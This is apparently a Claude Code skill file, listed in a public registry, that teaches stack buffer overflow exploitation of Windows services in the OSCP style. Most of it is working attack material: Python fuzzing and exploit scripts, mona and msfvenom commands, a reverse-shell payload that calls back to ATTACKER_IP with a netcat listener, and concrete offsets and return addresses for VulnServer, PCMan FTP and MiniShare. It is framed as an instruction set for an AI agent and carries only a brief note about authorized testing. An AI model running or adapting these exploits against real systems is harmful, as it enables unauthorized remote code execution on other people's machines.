Claude-skill-registry Buffer Overflow Exploitation
This skill should be used when the user asks to "exploit buffer overflow vulnerabilities", "develop stack-based exploits", "find EIP offset", "identify bad characters", "create shellcode payloads", "perform fuzzing for crashes", or "gain remote code execution via memory corruption". It provides comprehensive techniques for discovering and exploiting buffer overflow vulnerabilities in Windows applications.
install
source · Clone the upstream repo
git clone https://github.com/majiayu000/claude-skill-registry
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/majiayu000/claude-skill-registry "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/data/buffer-overflow-exploitation" ~/.claude/skills/majiayu000-claude-skill-registry-buffer-overflow-exploitation && rm -rf "$T"
manifest:
skills/data/buffer-overflow-exploitation/SKILL.mdsource content
Buffer Overflow Exploitation
Purpose
Execute systematic buffer overflow vulnerability discovery and exploitation against Windows applications to achieve remote code execution. This skill enables comprehensive fuzzing to identify crashes, determination of EIP offset, bad character identification, JMP ESP location discovery, shellcode generation, and final exploit construction for penetration testing and OSCP-style assessments.
Inputs / Prerequisites
Required Tools
- Immunity Debugger with Mona.py plugin installed
- Python 2.7 for exploit script development
- Metasploit Framework (msfvenom, pattern_create, pattern_offset)
- Netcat for reverse shell listener
- Target Windows application with known vulnerability
Environment Setup
- Windows VM with vulnerable application
- Kali Linux or attacker machine
- Network connectivity between machines
- Mona.py copied to
C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands
Knowledge Requirements
- Understanding of x86 assembly and memory layout
- Familiarity with stack structure (ESP, EIP, EBP)
- Basic Python socket programming
- Understanding of shellcode encoding
Outputs / Deliverables
Primary Outputs
- Working exploit achieving remote code execution
- Reverse shell on target system
- Documented exploitation process
- Exploit template for similar vulnerabilities
Evidence Artifacts
- Crash offset documentation
- Bad character list
- JMP ESP address with module info
- Complete exploit script
Core Workflow
Phase 1: Fuzzing the Application
Create Fuzzing Script
Systematically send increasing buffer sizes to identify crash point:
#!/usr/bin/python import socket from time import sleep length = 100 while True: try: print "Fuzzing with %d bytes" % length s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('TARGET_IP', TARGET_PORT)) s.recv(1024) s.send('COMMAND ' + 'A' * length + '\r\n') s.recv(1024) s.close() sleep(1) length += 100 except: print "Crashed at %d bytes" % length exit()
Monitor in Immunity Debugger
- Attach Immunity Debugger to target process
- Press F9 to run the application
- Run fuzzer and note crash byte count
- Observe EIP value (should show
for 'AAAA')41414141
Phase 2: Finding EIP Offset
Generate Unique Pattern
Create a non-repeating pattern to identify exact offset:
# Using Metasploit msf-pattern_create -l 2100 # Using Mona in Immunity !mona pattern_create 2100
Pattern saved to:
C:\Program Files\Immunity Inc\Immunity Debugger\pattern.txtSend Pattern to Application
#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('TARGET_IP', TARGET_PORT)) pattern = "Aa0Aa1Aa2Aa3..." # Full pattern from pattern_create s.recv(1024) s.send('COMMAND ' + pattern + '\r\n') s.recv(1024) s.close()
Determine Offset
After crash, note EIP value from Immunity Debugger:
# Using Metasploit msf-pattern_offset -q 396F4338 # Using Mona !mona pattern_offset 396F4338
Result: Exact position found (e.g., offset 2006)
Verify Offset Control
#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('TARGET_IP', TARGET_PORT)) offset = 2006 buffer = 'A' * offset + 'B' * 4 + 'C' * 400 s.recv(1024) s.send('COMMAND ' + buffer + '\r\n') s.recv(1024) s.close()
Verify EIP shows
42424242Phase 3: Bad Character Identification
Generate Bad Character Array
Create complete byte array for testing:
!mona bytearray
Output saved to:
C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.txtStandard Bad Character Array
badchars = ( "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f" "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f" "\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f" "\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f" "\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f" "\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf" "\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf" "\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
Send Bad Characters
#!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('TARGET_IP', TARGET_PORT)) offset = 2006 buffer = 'A' * offset + 'B' * 4 + badchars s.recv(1024) s.send('COMMAND ' + buffer + '\r\n') s.recv(1024) s.close()
Analyze in Immunity
- Right-click ESP register → Follow in Dump
- Examine hex dump for truncated or corrupted sequences
- Note character before corruption as bad character
Automated Bad Character Detection
# Compare memory with expected bytearray !mona compare -f C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin -a ESP_ADDRESS # Generate new bytearray excluding known bad chars !mona bytearray -cpb "\x00\x0a\x0d"
Common Bad Characters
| Character | Hex | Description |
|---|---|---|
| NULL | | String terminator |
| LF | | Line feed |
| CR | | Carriage return |
| Space | | Whitespace delimiter |
Phase 4: Finding JMP ESP
Search for JMP ESP Instruction
Locate a reliable return address to redirect execution:
# Find JMP ESP in loaded modules !mona jmp -r esp # Search specific module (without ASLR) !mona find -s "\xff\xe4" -m essfunc.dll # List modules to find suitable candidates !mona modules
Module Selection Criteria
Choose modules with these protections DISABLED:
- ASLR: False
- Rebase: False
- SafeSEH: False
- NXCompat: False
Manual JMP ESP Search
Using nasm_shell to get opcode:
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb nasm > JMP ESP 00000000 FFE4 jmp esp
Search in Immunity:
!mona find -s "\xff\xe4" -m MODULE.dllConvert Address to Little Endian
Found address:
0x625011AF\xAF\x11\x50\x62Using struct.pack:
import struct jmpesp = struct.pack("<I", 0x625011AF)
Phase 5: Shellcode Generation
Generate Reverse Shell Payload
msfvenom -p windows/shell_reverse_tcp \ LHOST=ATTACKER_IP \ LPORT=4444 \ EXITFUNC=thread \ -b "\x00\x0a\x0d" \ -e x86/shikata_ga_nai \ -f python \ -v shellcode
Parameters Explained
| Parameter | Purpose |
|---|---|
| Payload type |
| Attacker IP for callback |
| Attacker listening port |
| Clean exit without crashing |
| Bad characters to avoid |
| Encoder for obfuscation |
| Output format |
| Variable name |
Phase 6: Final Exploit Construction
Complete Exploit Template
#!/usr/bin/python import socket import struct import sys if len(sys.argv) < 2: print "\nUsage: " + sys.argv[0] + " <TARGET_IP>\n" sys.exit() # Configuration target_ip = sys.argv[1] target_port = 9999 offset = 2006 # JMP ESP address (little endian) jmpesp = struct.pack("<I", 0x625011AF) # NOP sled for decoder space nops = "\x90" * 20 # Shellcode (msfvenom output) shellcode = ( "\xba\xbd\x3a\xaf\xba\xd9\xf7\xd9\x74\x24\xf4" "\x5e\x31\xc9\xb1\x52\x31\x56\x12\x03\x56\x12" # ... rest of shellcode ) # Build buffer buffer = "A" * offset buffer += jmpesp buffer += nops buffer += shellcode # Send exploit try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) s.recv(1024) s.send('TRUN .' + buffer + '\r\n') s.recv(1024) s.close() print "[+] Exploit sent successfully" except: print "[-] Connection failed"
Execute Exploit
# Start listener on attacker nc -lvnp 4444 # Run exploit python2 exploit.py TARGET_IP # Receive shell connection
Quick Reference
Mona Commands Cheatsheet
| Command | Purpose |
|---|---|
| Create unique pattern |
| Find offset position |
| Generate byte array |
| Exclude bad chars |
| Compare memory |
| Find JMP ESP |
| List loaded modules |
| Search in module |
Exploitation Workflow Summary
1. Fuzz → Find crash point 2. Pattern → Determine EIP offset 3. Verify → Control EIP with known value 4. Badchars → Identify restricted bytes 5. JMP ESP → Find return address 6. Shellcode → Generate payload 7. Exploit → Combine and execute
Buffer Structure
[PADDING][EIP][NOP SLED][SHELLCODE] | | | | A*N JMP ESP \x90*20 msfvenom output
Common Offsets Reference
| Application | Command | Offset |
|---|---|---|
| VulnServer TRUN | TRUN . | 2006 |
| MiniShare 1.4.1 | GET | 1787 |
| PCMan FTP PORT | PORT | 2006 |
| FreeFloat FTP USER | USER | 230 |
Constraints and Guardrails
Operational Boundaries
- Test only against authorized systems and applications
- Use isolated lab environments for exploit development
- Document all testing activities and findings
- Avoid testing against production systems
Technical Limitations
- DEP (Data Execution Prevention) prevents stack execution
- ASLR randomizes module addresses each reboot
- Stack canaries detect buffer overflows
- SafeSEH restricts exception handler exploitation
Bypass Considerations
- DEP Bypass: ROP chains, ret2libc techniques
- ASLR Bypass: Information leaks, fixed modules
- Canary Bypass: Format string bugs, heap overflow
Examples
Example 1: VulnServer TRUN Exploitation
Fuzzing Result: Crash at ~2100 bytes EIP Offset: 2006 bytes Bad Characters:
\x000x625011AFExploit:
buffer = "A" * 2006 buffer += "\xAF\x11\x50\x62" # JMP ESP buffer += "\x90" * 20 # NOP sled buffer += shellcode # Reverse shell
Example 2: PCMan FTP PORT Command
Fuzzing Result: Crash at ~2100 bytes EIP Offset: 2006 bytes Bad Characters:
\x00\x0a\x0d0x75E2798DExploit Structure:
s.send("USER Anonymous\r\n") s.recv(1024) s.send("PASS pass\r\n") s.recv(1024) s.send("PORT " + buffer + "\r\n")
Example 3: MiniShare 1.4.1 HTTP GET
Fuzzing Result: Crash at ~1800 bytes EIP Offset: 1787 bytes Bad Characters:
\x00\x0d0x7E6B30D7Buffer Format:
metodo_http = "GET " buffer = "A" * 1787 + jmpesp + nops + shellcode cabecera_http = " HTTP/1.1\r\n\r\n" payload = metodo_http + buffer + cabecera_http
Troubleshooting
Exploit Crashes Application But No Shell
- Verify shellcode bad characters are excluded
- Increase NOP sled size for decoder space
- Check LHOST/LPORT in shellcode match listener
- Ensure EXITFUNC=thread for stable exit
EIP Not Overwritten as Expected
- Verify offset calculation is correct
- Check for additional bad characters affecting padding
- Ensure complete pattern reaches EIP position
JMP ESP Address Causes Crash
- Verify module has ASLR disabled
- Check address doesn't contain bad characters
- Confirm address valid after application restart
Shellcode Not Executing
- DEP may be enabled - check module protections
- NOP sled too short for decoder
- Bad characters corrupting shellcode
- Try different encoder or manual encoding
Application Crashes Before Shell
- EXITFUNC incorrect - try
,thread
, orprocessseh - Shellcode size exceeds available buffer space
- Stack alignment issues - add stack adjustment